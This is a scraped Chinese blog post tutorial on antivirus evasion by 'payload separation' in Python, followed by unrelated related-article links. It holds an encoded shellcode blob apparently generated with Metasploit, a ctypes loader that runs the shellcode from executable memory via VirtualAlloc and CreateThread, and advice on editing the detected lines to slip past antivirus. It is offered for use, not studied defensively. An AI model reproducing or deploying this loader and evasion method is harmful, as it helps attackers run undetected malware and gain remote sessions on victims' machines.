首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Python

通过Python实现Payload分离免杀过程详解

Posted in Python onJuly 13, 2020

缺点:

编译成exe以后体积过大

实现:

msf生成shellcode代码:

通过Python实现Payload分离免杀过程详解

将payload给copy下来,去除引号。

\x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42
\x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33
\x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x72\x44\x78\x68\x66
\x41\x49\x73\x49\x4d\x48\x50\x44\x51\x48\x48\x34\x76\x4a\x53
\x56\x34\x74\x53\x45\x49\x74\x4b\x50\x49\x74\x4d\x45\x58\x6a
\x6a\x53\x41\x48\x52\x55\x59\x74\x5a\x49\x41\x48\x54\x69\x30
\x6b\x59\x34\x7a\x70\x4a\x69\x7a\x53\x4c\x41\x64\x59\x78\x2f
\x36\x7a\x42\x7a\x77\x30\x42\x78\x7a\x6a\x67\x64\x66\x59\x44
\x66\x66\x67\x37\x66\x53\x52\x31\x35\x46\x69\x4c\x57\x43\x51
\x42\x30\x32\x61\x4c\x44\x45\x75\x4c\x57\x42\x77\x42\x30\x34
\x73\x45\x69\x77\x48\x51\x69\x55\x51\x6b\x4a\x46\x74\x62\x59
\x56\x6c\x61\x55\x66\x2f\x67\x58\x31\x39\x61\x69\x78\x4c\x72
\x6a\x56\x31\x6f\x4d\x7a\x49\x41\x41\x47\x68\x33\x63\x7a\x4a
\x66\x56\x47\x68\x4d\x64\x79\x59\x48\x69\x65\x6a\x2f\x30\x4c
\x69\x51\x41\x51\x41\x41\x4b\x63\x52\x55\x55\x47\x67\x70\x67
\x47\x73\x41\x2f\x39\x56\x71\x43\x6d\x6a\x41\x71\x41\x4d\x38
\x61\x41\x49\x41\x44\x51\x57\x4a\x35\x6c\x42\x51\x55\x46\x42
\x41\x55\x45\x42\x51\x61\x4f\x6f\x50\x33\x2b\x44\x2f\x31\x5a
\x64\x71\x45\x46\x5a\x58\x61\x4a\x6d\x6c\x64\x47\x48\x2f\x31
\x59\x58\x41\x64\x41\x72\x2f\x54\x67\x68\x31\x37\x4f\x68\x6e
\x41\x41\x41\x41\x61\x67\x42\x71\x42\x46\x5a\x58\x61\x41\x4c
\x5a\x79\x46\x2f\x2f\x31\x59\x50\x34\x41\x48\x34\x32\x69\x7a
\x5a\x71\x51\x47\x67\x41\x45\x41\x41\x41\x56\x6d\x6f\x41\x61
\x46\x69\x6b\x55\x2b\x58\x2f\x31\x5a\x4e\x54\x61\x67\x42\x57
\x55\x31\x64\x6f\x41\x74\x6e\x49\x58\x2f\x2f\x56\x67\x2f\x67
\x41\x66\x53\x68\x59\x61\x41\x42\x41\x41\x41\x42\x71\x41\x46
\x42\x6f\x43\x79\x38\x50\x4d\x50\x2f\x56\x56\x32\x68\x31\x62
\x6b\x31\x68\x2f\x39\x56\x65\x58\x76\x38\x4d\x4a\x41\x2b\x46
\x63\x50\x2f\x2f\x2f\x2b\x6d\x62\x2f\x2f\x2f\x2f\x41\x63\x4d
\x70\x78\x6e\x58\x42\x77\x37\x76\x77\x74\x61\x4a\x57\x61\x67
\x42\x54\x2f\x39\x55\x3d

将自己的代码放入第3行的shell_code位置。

import ctypes,base64
 
encode_shellcode = "shell_code"
shellcode = base64.b64decode(encode_shellcode)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

以上代码是绝对会被查杀的,但是可以通过修改代码绕过。思路如下,先查找杀软查杀哪里,再修改杀软查杀的代码,同时保证正常运行。提示一下,查杀的代码再5-6行之间,对其进行修改即可。

返回session:

通过Python实现Payload分离免杀过程详解

免杀效果:

通过Python实现Payload分离免杀过程详解

参考资料:

https://github.com/TideSec/BypassAntiVirus

https://micro8.gitbook.io/micro8/

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持三水点靠木。

通过Python实现Payload分离免杀过程详解

- Author -

返回主页aptkekeo

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Python 相关文章推荐
Python构建网页爬虫原理分析
Dec 19 Python
python批量修改图片后缀的方法(png到jpg)
Oct 25 Python
Python多图片合并PDF的方法
Jan 03 Python
Python pip替换为阿里源的方法步骤
Jul 02 Python
基于python的Paxos算法实现
Jul 03 Python
Python实现蒙特卡洛算法小实验过程详解
Jul 12 Python
Python3 A*寻路算法实现方式
Dec 24 Python
python GUI库图形界面开发之PyQt5 MDI(多文档窗口)QMidArea详细使用方法与实例
Mar 05 Python
使用matlab 判断两个矩阵是否相等的实例
May 11 Python
Python Pillow(PIL)库的用法详解
Sep 19 Python
使用python-cv2实现Harr+Adaboost人脸识别的示例
Oct 27 Python
教你利用Selenium+python自动化来解决pip使用异常
May 20 Python
python上selenium的弹框操作实现
Jul 13 #Python
python如何导入依赖包
Jul 13 #Python
python入门:argparse浅析 nargs='+'作用
Jul 12 #Python
浅谈Python 命令行参数argparse写入图片路径操作
Jul 12 #Python
Python实现封装打包自己写的代码,被python import
Jul 12 #Python
Django封装交互接口代码
Jul 12 #Python
在django中实现choices字段获取对应字段值
Jul 12 #Python
AOP(2) promise(2) XDM(3) 继承(1) 动态权限(1) 验证表达式(1) 构造函数(1) redis(3) Spring Security(2) Kotlin(1)
You might like
php使用百度翻译api示例分享
2014/01/31 PHP
php+MySQL实现登录时验证登录名和密码是否正确
2016/05/10 PHP
如何在centos8自定义目录安装php7.3
2019/11/28 PHP
jQuery版仿Path菜单效果
2011/12/15 Javascript
Bootstrap每天必学之导航组件
2016/04/25 Javascript
jQuery通过ajax请求php遍历json数组到table中的代码(推荐)
2016/06/12 Javascript
最细致的vue.js基础语法 值得收藏!
2016/11/03 Javascript
vue双向绑定的简单实现
2016/12/22 Javascript
JavaScript中利用for循环遍历数组
2017/01/15 Javascript
js实现无缝滚动图
2017/02/22 Javascript
在vue项目中安装使用Mint-UI的方法
2017/12/27 Javascript
webpack中使用iconfont字体图标的方法
2018/02/22 Javascript
理顺8个版本vue的区别(小结)
2018/09/17 Javascript
JS中作用域以及变量范围分析
2020/07/18 Javascript
利用node.js开发cli的完整步骤
2020/12/29 Javascript
一起深入理解js中的事件对象
2021/02/06 Javascript
[02:49]2014DOTA2电竞也是体育项目! 势要把荣誉带回中国!
2014/07/20 DOTA
Python中Selenium模拟JQuery滑动解锁实例
2017/07/26 Python
详解Python nose单元测试框架的安装与使用
2017/12/20 Python
Python装饰器(decorator)定义与用法详解
2018/02/09 Python
Python使用add_subplot与subplot画子图操作示例
2018/06/01 Python
python用opencv批量截取图像指定区域的方法
2019/01/24 Python
详解使用Python下载文件的几种方法
2019/10/13 Python
在tensorflow中设置使用某一块GPU、多GPU、CPU的操作
2020/02/07 Python
Django自带的用户验证系统实现
2020/12/18 Python
YSL圣罗兰美妆官方旗舰店:购买YSL口红
2018/04/16 全球购物
加热夹克:RAVEAN
2018/10/19 全球购物
接口的多继承会带来哪些问题
2015/08/17 面试题
大学自主招生自荐信
2013/12/16 职场文书
保险公司晨会主持词
2014/03/22 职场文书
2014年培训工作总结范文
2014/11/27 职场文书
房地产销售经理岗位职责
2015/02/02 职场文书
2015年销售员工作总结范文
2015/04/07 职场文书
pytorch中F.avg_pool1d()和F.avg_pool2d()的使用操作
2021/05/22 Python
JPA如何使用entityManager执行SQL并指定返回类型
2021/06/15 Java/Android
Netty结合Protobuf进行编解码的方法
2021/06/26 Java/Android